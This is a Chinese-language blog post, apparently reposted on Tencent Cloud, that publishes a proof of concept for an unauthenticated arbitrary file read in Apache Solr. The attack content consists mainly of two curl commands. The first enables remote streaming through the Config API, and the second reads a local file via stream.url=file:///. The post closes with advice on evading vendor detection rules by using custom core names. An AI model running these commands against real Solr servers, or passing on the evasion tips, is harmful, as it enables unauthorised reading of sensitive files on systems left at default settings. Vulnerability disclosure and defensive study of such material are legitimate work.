Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >公布某Solr最新版任意文件读取0day

公布某Solr最新版任意文件读取0day

作者头像
用户7151998
发布于 2023-07-24 10:58:30
发布于 2023-07-24 10:58:30
37900
代码可运行
举报
文章被收录于专栏:赛博回忆录赛博回忆录
运行总次数:0
代码可运行

0x00 前言 skay之前在审计solr的时候发现了一个任意文件读取的漏洞,不过报给官方后官方拒绝修复,认为这不是一个漏洞(????) 既然不是漏洞,那么现在就公开吧,大家开心一下也好的。 其实cert那篇里已经发过了,但是太长了放在最后面怕大家看不见,所以征得skay大小姐的同意后决定重新发一下。 0x01 正文 全版本任意文件读取(官方拒绝修复)

默认安装未授权情况下,各项配置皆为默认

下载Solr最新版本

http://archive.apache.org/dist/lucene/solr/8.80/solr-8.8.0.tgz

POC

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
curl -d '{  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://192.168.33.130:8983/solr/db/config -H 'Content-type:application/json'

curl "http://192.168.33.130:8983/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///C:/a.txt" 
复现

1.第一步

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
curl -d '{  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://192.168.33.130:8983/solr/db/config -H 'Content-type:application/json'

2.第二步

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
curl "http://192.168.33.130:8983/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///C:/a.txt" 

0x03 漏洞信息跟进

https://cwiki.apache.org/confluence/display/solr/SolrSecurity

https://issues.apache.org/jira/browse/SOLR

0x04 厂商防护及绕过思路

这种组件直接放内网就好了,或者一定配置身份校验,且Solr路由写的比较死,厂商提取规则时只要将url过滤完整即可,不会存在绕过情况。

绕过的话,虽然说每个漏洞url较为固定,但是每个功能的触发点皆为每个core或collection,core的名称包含在url中,且生产环境中为用户自定义,很多规则编写者通常只将示例example加入检测,可绕过几率很高。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-03-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 赛博回忆录 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Apache Solr <= 8.8.1任意文件读取漏洞复现
Apache Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。
Timeline Sec
2021/04/12
3K0
(0day)Apache Solr任意文件读取漏洞复现
Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。
Khan安全团队
2021/03/24
9210
(0day)Apache Solr任意文件读取漏洞复现
Apache Solr 任意文件读取漏洞(poc编写 )
Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件
红队蓝军
2024/09/02
3610
Apache Solr 任意文件读取漏洞(poc编写 )
【漏洞通告】Apache Solr任意文件读取与SSRF漏洞
近日,绿盟科技监测到网上披露了Apache Solr的文件读取与SSRF漏洞,由于Apache Solr默认安装时未开启身份验证,导致未经身份验证的攻击者可利用Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,从而利用漏洞进行文件读取。目前漏洞PoC已公开,请相关用户采取措施进行防护。
绿盟科技安全情报
2021/04/07
9890
CVE-2021-27905:Apache Solr SSRF And Arbitrary file read
2021年3月17日,有安全研究人员称在Apache Solr 8.8.2版本之前存在SSRF漏洞和任意文件读取漏洞,攻击者可以利用该漏洞进行SSRF攻击或者读取服务器端任意文件,危害较大,建议用户升级到最新的安全版本。
Al1ex
2021/07/21
1.4K0
CVE-2021-27905:Apache Solr SSRF And Arbitrary file read
MetInfo 任意文件读取漏洞的修复与绕过
MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
逍遥子大表哥
2021/12/17
2.1K0
MetInfo 任意文件读取漏洞的修复与绕过
MetInfo 任意文件读取漏洞的修复与绕过
404实验室内部的WAM(Web应用监控程序,文末有关于WAM的介绍)监控到 MetInfo 版本更新,并且自动diff了文件,从diff上来看,应该是修复了一个任意文件读取漏洞,但是没有修复完全,导致还可以被绕过,本文就是记录这个漏洞的修复与绕过的过程。
Seebug漏洞平台
2018/09/30
1.4K0
MetInfo 任意文件读取漏洞的修复与绕过
目录遍历+任意文件读取+任意文件下载
目录遍历又称"路径遍历",由于web服务器配置错误导致网站的目录暴露可以被随意浏览,这种被称为"目录遍历"
vFREE
2021/12/20
4.9K0
目录遍历+任意文件读取+任意文件下载
CVE-2020-13957:Apche Solr 未授权上传漏洞复现
上传configset——基于configset再次上传configset(跳过身份检测)——利用新configset创造collection——利用solrVelocity模板进行RCE
Timeline Sec
2020/11/04
2.2K1
CVE-2020-13957:Apche Solr 未授权上传漏洞复现
Apache Solr <= 8.8.2任意文件删除漏洞复现
Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。
Timeline Sec
2021/06/25
1.5K0
[CVE-2019-0193] - Apache Solr DataImport 远程命令执行分析
语雀链接:https://www.yuque.com/tianxiadamutou/zcfd4v/uyceyo
亿人安全
2022/06/30
1.2K0
[CVE-2019-0193] - Apache Solr DataImport 远程命令执行分析
Python代码审计实战案例总结之CRLF和任意文件读取
Python代码审计方法多种多样,但是总而言之是根据前人思路的迁移融合扩展而形成。目前Python代码审计思路,呈现分散和多样的趋势。Python微薄研发经验以及结合实际遇到的思路和技巧进行总结,以便于朋友们的学习和参考。
FB客服
2020/02/12
1.7K0
Python代码审计实战案例总结之CRLF和任意文件读取
CVE-2019-0193:Apache Solr远程命令执行漏洞复现
在Burp中发送以下POC即可执行命令弹出计算器,下面的<your_core_name> 需要替换为你获取到的 core 的 name(共两处)
Timeline Sec
2019/12/15
2.4K0
【代码审计】任意文件读取漏洞实例
大多数网站都提供读取文件功能,一般实现过程是,根据参数filename的值,获得该文件在网站上的绝对路径,读取文件。 这里,通过两个任意文件读取漏洞实例去展示漏洞原理、漏洞危害。
Bypass
2019/07/08
1.3K0
【代码审计】任意文件读取漏洞实例
Apache Solr最新RCE批量验证
批量C段:Cscan 192.168.1.8/24 批量URL:Cscan(同目录放url.txt)
HACK学习
2019/11/14
1.4K0
任意文件读取与下载的原理及修复
任意文件读取下载 由于一些网站的业务需要,往往需要提供文件读取或下载的一个模块,但如果没有对读取或下载做一个白名单或者限制,可能导致恶意攻击者读取下载一些敏感信息(etc/passwd 等),对服务器做下一步的进攻与威胁。
物联网安全小编
2020/03/12
7.8K0
WEB漏洞|目录浏览(目录遍历)漏洞和任意文件读取/下载漏洞
目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以为进一步入侵网站做准备。
谢公子
2022/01/13
14.5K0
WEB漏洞|目录浏览(目录遍历)漏洞和任意文件读取/下载漏洞
【漏洞预警】Windows任意文件读取0day漏洞处置手册
近日,国外安全研究员 SandboxEscaper又一次在推特上公布了新的Windows 0 day漏洞细节及PoC。这是2018年8月开始该研究员公布的第三个windows 0 day漏洞。此次披露的漏洞可造成任意文件读取。该漏洞可允许低权限用户或恶意程序读取目标Windows主机上任意文件的内容,但不可对文件进行写入操作。在微软官方补丁发布之前,所有windows用户都将受此漏洞影响。
绿盟科技安全情报
2019/10/24
8100
【漏洞预警】Windows任意文件读取0day漏洞处置手册
【代码审计】QYKCMS后台任意文件上传、任意文件读取漏洞
青云客网站管理系统(QYKCMS)是青云客开发的一款基于PHP+MySql的轻量级智能建站系统。在T00ls看到两篇QYKCMS的代码审计文章,也下载了一套回来测试,发现了两个后台漏洞,并没有跟前面的漏洞重复,分享一下思路。
Bypass
2019/07/08
1.1K0
【代码审计】QYKCMS后台任意文件上传、任意文件读取漏洞
端口漏洞全集
web漏洞挖腻了?到客户现场找不到web漏洞?不然来试试各个端口中存在的漏洞吧。以下是本人在项目中整理的端口漏洞合计,可能不是很全欢迎各位大佬补充。
Khan安全团队
2020/05/06
1.7K0
推荐阅读
相关推荐
Apache Solr <= 8.8.1任意文件读取漏洞复现
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档